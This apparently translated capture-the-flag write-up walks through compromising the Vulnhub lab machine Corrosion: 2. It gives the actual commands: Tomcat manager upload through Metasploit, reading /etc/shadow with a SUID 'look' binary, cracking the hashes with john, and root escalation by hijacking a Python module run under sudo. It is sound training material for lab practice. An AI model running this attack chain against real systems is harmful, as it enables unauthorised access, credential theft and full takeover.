Vulnhub target machine Corrosion: 2 penetration test detailed explanation
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides a variety of vulnerability platforms. It can be downloaded from a variety of virtual machines, and the local VM can be opened. It is like playing a game to complete interesting combats such as penetration testing, privilege escalation, vulnerability exploitation, and code auditing.
This is a vulnerability target drone, just need to find the flag as usual.
Difficulty: Medium
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/corrosion/Corrosion2.ova
Vulnhub target machine installation:
After downloading, unzip the installation package and use it VMware
to open it.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
kali
use arp-scan -l
or netdiscover
discover hosts
Use the command:
nmap -sS -sV -T4 -n -p- 192.168.0.100
Infiltration machine: kali IP: 192.168.0.104 Target machine IP: 192.168.0.100
22、80、8080
The port is turned on , the service 8080
is turned on, and the old access port ( default page) is scanned: etc.tomcat
80
Apache
dirb、dirsearch、whatweb、gobuster、nikto
dirsearch -u http://192.168.0.100 #没有可以利用的信息(一般没有可以利用信息就扫二级目录)
dirsearch -u http://192.168.0.100:8080 #这波信息收集得到了backup.zip和readme.txt文件
gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip #没有可以利用的信息
gobuster dir -u http://192.168.0.100:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 400,404
whatweb
Get an account: randy
Download and backup.zip
find that you need a password to try to blast and Corrosion1
get the same password:@administrator_hi5
You can refer to Corrosion
the first article of the series for detailed methods: http://t.csdn.cn/XmjAR
Check the configuration file tomcat-users.xml
and find two sets of account passwords: manager/melehifokivai
and admin/melehifokivai
try to log in, and the login is successful!
②: Tomcat msf upload vulnerability to get the shell:
Open msfconsole
the console to use the module: use exploit/multi/http/tomcat_mgr_upload
set parameters
set RHOST 192.168.0.100
set HttpPassword melehifokivai
set HttpUsername manager
set RPORT 80
run
Switch Shell,
the following three users in the home jaye
without permission to enter randy
the user to view user.txt
and get the first one flag
!
Try to switch jaye
users, try tomcat
the password to enter the magic! Use python
get terminal:python3 -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd
If it is found, ssh
then we will switch to ssh
login to make the operation more convenient!
Use the command to view root
executable commands:find / -perm -u=s -type f 2>/dev/null
③: look unauthorized operation:
Here I found a look
command that can be used (the first time I use it, no ~) I can’t see ./look '' "$LFILE"
the file name that I don’t have permission to run and view.
look
How to use unauthorized commands: https://gtfobins.github.io/gtfobins/look/
In fact, you can directly use this unauthorized command to view root
the file here. ./look '' /root/root.txt
View /etc/shadow
and /ect/passwd
file, unshadow
the command generates all the passwords that need to be cracked and then john
blasts them
(you must copy all the contents of the two files or they will not come out). The dictionary is: rockyou.txt
(It takes a long time!! )
unshadow passwd shadow > pass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt
The password obtained randy
is:07051986randy
④: sudo executes Base64.py privilege escalation
After a successful login, a wave of information collection: found that this script id,whoami,sudo-l
can be executedrandombase64
py
We directly write in the python
program base64
module, shell
first find this script and then use it vi
or launch it nano
with the editor ctrl+X
(it took a long time to use it for the first time)
cd /usr/lib/python3.8
ls -al base* #找到base64.py 写入下面得内容
import os
os.system("bin/bash")
sudo /usr/bin/python3.8 /home/randy/randombase64.py #运行即可 因为使用得是pyton3.8 也可以尝试别的成功即可!!
⑤: Get LFAGL:
So far, the flag has been obtained, and the penetration of this article is over. Thank you for watching! !
Vulnhub target penetration summary:
The difficulty of this target machine is above the middle level because it is more troublesome
1. Information collection arp-scan -l
Obtain ip address and port information web
scanning tool: nikto,dirb,dirbuster,whatweb,ffuf
wait to view F12
source code information
2. MSF exploit/multi/http/tomcat_mgr_upload
Module getshell
(you need to know the account password)
3. zip2john
Blasting and fcrackzip
(blasting compression package tool) and john
error resolution Method look
./look '' 文件名即可
sudo 提权执行base64.py
shell
( new knowledge point!) 4. Command to read files beyond authority Let’s not demonstrate it first, you can understand it)
Linux Polkit
CVE-2021-4034
Corrosion
The series is over. It’s been a very rewarding day after learning a lot of knowledge points (Yeah!) The
final creation is not easy, I hope it can be helpful to everyone. If you like it, please give me a one-click triple link. Your happiness is my greatest happiness. ! !